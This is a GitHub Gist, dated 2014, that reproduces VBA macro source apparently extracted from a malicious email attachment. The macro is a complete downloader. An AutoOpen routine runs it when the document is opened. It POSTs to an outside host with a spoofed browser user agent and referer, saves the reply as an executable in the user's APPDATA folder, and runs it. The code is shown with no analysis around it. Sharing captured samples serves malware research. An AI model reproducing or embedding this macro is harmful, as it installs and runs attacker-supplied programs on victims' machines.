Created
November 26, 2014 10:22
-
-
Save LoadLow/7b8dfc9dfefc8205ae24 to your computer and use it in GitHub Desktop.
Hex-dump macro exploit from malicious mail
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ------------------------------------------------------------------------------- | |
| ThisDocument.cls | |
| Attribute VB_Name = "ThisDocument" | |
| Attribute VB_Base = "1Normal.ThisDocument" | |
| Attribute VB_GlobalNameSpace = False | |
| Attribute VB_Creatable = False | |
| Attribute VB_PredeclaredId = True | |
| Attribute VB_Exposed = True | |
| Attribute VB_TemplateDerived = True | |
| Attribute VB_Customizable = True | |
| ------------------------------------------------------------------------------- | |
| Module1.bas | |
| Attribute VB_Name = "Module1" | |
| Sub Help() | |
| Start | |
| End Sub | |
| Sub AutoOpen() | |
| Help | |
| End Sub | |
| Sub Start() | |
| Const PositionBegin As Integer = 0 | |
| Const EnvVar As String = "APPDATA" | |
| Const UserAg As String = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" | |
| Set NewObj = CreateObject("Msxml2.XMLHTTP") | |
| NewObj.Open "POST", "http://z5h1.biz/", False | |
| NewObj.setRequestHeader "User-Agent", UserAg | |
| NewObj.setRequestHeader "Referer", "google.com" | |
| NewObj.send | |
| Dim X | |
| X = NewObj.responseBody | |
| Set Stream = CreateObject("Adodb.Stream") | |
| Stream.Open | |
| Stream.Type = 0 + 1 | |
| Stream.Write X | |
| Position = PositionBegin | |
| Dim Appdata As String | |
| Dim PresentationName As String | |
| PresentationName = Environ(EnvVar) & "/presentation[en].exe" | |
| Stream.SaveToFile PresentationName, 1 + 1 | |
| Shell PresentationName, vbNormalNoFocus | |
| End Sub | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment